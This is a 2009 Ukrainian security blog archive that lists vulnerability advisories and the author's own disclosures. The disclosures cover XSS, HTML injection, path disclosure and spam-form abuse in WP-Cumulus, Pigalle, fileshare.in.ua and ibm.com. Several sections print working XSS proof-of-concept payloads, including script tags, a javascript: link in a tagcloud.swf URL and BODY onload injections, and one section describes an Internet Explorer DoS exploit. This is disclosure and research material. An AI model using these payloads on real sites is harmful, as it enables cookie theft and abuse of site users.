Архів для категорії 'Уразливості'

Добірка уразливостей

16:19 13.11.2009

В даній добірці уразливості в веб додатках:

  • Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability (деталі)
  • OpenCart Order By Blind SQL Injection (деталі)
  • CPANEL File Manager XSS Vulnerability (деталі)
  • GStreamer Base Plugins vulnerability (деталі)
  • Vulnerability in GnuTLS (деталі)
  • Sitecore .NET 5.3.x - web service information disclosure (деталі)
  • chaozzDB <= 1.2 Critical File Disclosure Vulnerability (деталі)
  • FubarForum <= 1.6 Critical File Disclosure Vulnerability (деталі)
  • FireAnt <= 1.3 Critical File Disclosure Vulnerability (деталі)
  • HP Service Manager (HPSM) Gain Extended Privileges (деталі)

Уразливість на md5.turhu.us

23:59 11.11.2009

У березні, 17.03.2009, я знайшов Cross-Site Scripting уразливість на секюріті проекті http://md5.turhu.us. Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

Добірка уразливостей

17:18 11.11.2009

В даній добірці уразливості в веб додатках:

  • Cisco IOS Secure Shell Denial of Service (деталі)
  • New mahara packages fix cross-site scripting (деталі)
  • WeBid <= 0.7.3 RC9 Multiple Remote File Inclution Vulnerabilities (деталі)
  • Aryanic HighCMS and HighPortal multiple Vulnerabilities (деталі)
  • WebSVN: Multiple vulnerabilities (деталі)
  • Technical Details of Security Issues Regarding Safari for Windows (деталі)
  • Living CMS Cross-Site Scripting vulnerability (деталі)
  • BLOG CMS Cross-Site Scripting vulnerability (деталі)
  • A.CMS Multiple Vulnerabilities (деталі)
  • Infopop UBB.Threads Admin Credentials via SQL Injection (деталі)

Уразливості на fileshare.in.ua

20:05 10.11.2009

27.03.2009

У липні, 11.07.2008, я знайшов Insufficient Authorization, Insufficient Anti-automation та Cross-Site Scripting уразливості на http://fileshare.in.ua (файлообмінник та хостінг файлів). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на fileshare.in.ua та нові уразливості на fileshare.in.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.11.2009

Insufficient Authorization:

http://fileshare.in.ua/748475?fedit

Можливе вільне редагування описів файлів.

Insufficient Anti-automation:

http://fileshare.in.ua/748475?fedit

Відсутній захист від автоматизованих запитів (капча).

XSS (persistent):

POST запит на сторінці http://fileshare.in.ua/748475?fedit
<script>alert(document.cookie)</script>В полях: Имя файла, Описание, Теги.

XSS:

Дані уразливості вже виправлені. Але остання уразливість виправлена не повністю і при невеликій зміні атакуючого коду, знову працює.

XSS (Mozilla):

Уразливості в WP-Cumulus для WordPress

23:58 09.11.2009

У березні, 15.03.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в плагіні WP-Cumulus для WordPress. Про що найближчим часом повідомлю розробникам.

Дірки я виявив на http://glaive.org.ua - сайті Glaive Security Group. І як я виявив нещодавно, хлопці явно зрозуміли, що не потрібно “страждати дірявістю” з дірявим WordPress та дірявими плагінами до нього, і прибрали WP зі свого сайта ;-) .

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі WP-Cumulus 1.22 та попередні версії. В версії 1.23 розробником була виправлена XSS, але не HTML Injection.

Добірка уразливостей

16:10 09.11.2009

В даній добірці уразливості в веб додатках:

  • ntop <= 3.3.10 Basic Authentication Null Pointer Denial of Service (деталі)
  • Blogsa <= 1.0 Beta 3 XSS Vulnerability (деталі)
  • Zabbix 1.6.2 Frontend Multiple Vulnerabilities (деталі)
  • BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI) (деталі)
  • NovaBoard <= 1.0.1 / XSS Vulnerability (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
  • TikiWiki 2.2 XSS Vulnerability in URI (деталі)
  • Trellis Desk v1.0 XSS Vulnerability (деталі)
  • NextApp Echo XML Injection Vulnerability (деталі)
  • Sun Java System Communications Express [HTML Injection] (деталі)

Уразливості в Pigalle

19:21 07.11.2009

15.09.2009

У січні, 23.01.2009, я знайшов Information Leakage, Full path disclosure та Cross-Site Scripting уразливості в Pigalle. Це веб додаток від автора Power Phlogger та YaBook. Уразливості виявив на офіційному сайті http://pigalle.phpee.com. Про що найближчим часом повідомлю розробнику.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику веб додатка.

07.11.2009

Information Leakage:

http://site/index.php

В meta-тегах на всіх сторінках виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/index.php

http://site/index.php?start=1′

http://site/index.php?mode=view&alb=IBM_Stucki&pic=1

http://site/index.php?mode=view&alb=1

http://site/index.php?mode=view

http://site/index.php?mode=album

http://site/index.php?mode=album&alb=1

http://site/config.inc.php

http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=’

XSS:

http://site/index.php?mode=view&alb=IBM_Stucki&pic=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=%3CBODY%20onload=alert(document.cookie)%3E

Уразливі Pigalle 0.76-alpha та попередні версії.

DoS уразливість в Internet Explorer

23:52 06.11.2009

Сьогодні я підтвердив свої підозри стосовно Denial of Service уразливості в Internet Explorer. Ще в літку 2008 я здогадувався про існування цієї уразливості й лише сьогодні перевирів її, під час написання своєї статті.

Дану атаку я назвав DoS через хоумпейдж (DoS via homepage attack).

DoS:

IE DoS Exploit10.html

При запуску експлоіта в IE6 браузер блокується, ним стає неможливо користуватися і його можна лише закрити (через Task Manager).

При запуску експлоіта в IE7 і кліку по лінці браузер зависає.

Уразлива версія Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) та попередні версії (та потенційно й наступні версії).

Добірка уразливостей

16:12 06.11.2009

В даній добірці уразливості в веб додатках:

  • AREVA e-terrahabitat / e-terraplatform Multiple Vulnerabilities (деталі)
  • EZ-Blog Beta 1 Multiple SQL Injection (деталі)
  • BlogMan 0.45 Multiple Vulnerabilities (деталі)
  • YEKTA WEB Academic Web Tools CMS Multiple XSS (деталі)
  • Afian Document Manager Local File Inclusion (деталі)
  • Drupal Local File Inclusion Vulnerability (Windows) (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Unauthorized Access to Data (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
  • eXtplorer Remote Code Execution (деталі)
  • RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability (деталі)

Нові уразливості на www.ibm.com

23:55 04.11.2009

У березні, 10.03.2009, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на http://www.ibm.com - сайті компанії IBM. Яка є секюріті компанією (після купівлі ISS і Watchfire). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.ibm.com.

Insufficient Anti-automation:

В формі “E-mail this page” на сторінках сайта http://www.ibm.com (www.ibm.com, www-01.ibm.com та інших доменах) немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

В даній формі можна вказати емайл, ім’я та призвіще отримувача, емайл, ім’я та призвіще відправника, тому її можна використати для розсилання спаму. А з врахуванням функції “Send me a copy of this e-mail” та Insufficient Anti-automation, дана уразливість створює з форми цілий Spam Gateway.